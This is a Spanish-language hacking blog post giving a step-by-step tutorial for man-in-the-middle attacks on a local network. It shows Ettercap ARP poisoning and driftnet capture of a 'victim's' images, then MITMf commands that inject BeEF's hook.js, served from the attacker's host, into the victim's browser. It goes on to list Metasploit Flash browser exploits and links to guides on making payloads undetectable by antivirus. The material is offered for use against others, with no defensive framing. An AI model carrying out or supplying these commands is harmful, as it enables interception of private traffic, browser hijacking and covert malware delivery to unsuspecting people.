cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.
Primer escenario Ettercap
En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento.
Listado de red lo puedo ver en "Hosts" >> Hosts List
la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2 una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.
Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":
luego de ello le daremos en primera opción "para establecer el sniffeo remoto.
al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0
root@kali:~# driftnet -i eth0
Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes, un ejemplo mi victima esta en la siguiente web:
Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:
Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:
http://backtrack-omar.blogspot.pe/2015/10/capturando-e-interceptando-datos-de-red.html
Segundo escenario MITMF
MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.
Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.
descarga:
https://github.com/byt3bl33d3r/MITMf/
Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.
root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev
Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt
root@kali:~# pip install virtualenvwrapper
Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:
http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html
En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP
root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js
entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.
al momento que la victima entre nosotros en primer plano tendremos los datos DNS:
Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.
Aqui unos metodos de explotacion:
http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html
Atacando con metasploit:
En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:
Módulos nuevos:
Name Disclosure Date Rank Description
auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill
exploit/multi/browser/adobe_flash_shader_job_overflow
http://backtrack-omar.blogspot.pe/2015/09/2015-flash-0day-exploit-hackingteam.html
root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)
de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:
http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html
Diferentes técnicas para crear tus payload:
http://backtrack-omar.blogspot.pe/2015/10/unicorn-la-herramienta-de-infeccion.html
http://backtrack-omar.blogspot.pe/2015/10/winrar-nuestro-viejo-aliado-de.html
http://backtrack-omar.blogspot.pe/2015/10/pupy-remote-administration-tool.html
Espere los aya gustado este articulo !!, un saludo para todas mis amistades.
Saludos y éxitos!
0 comentarios:
Publicar un comentario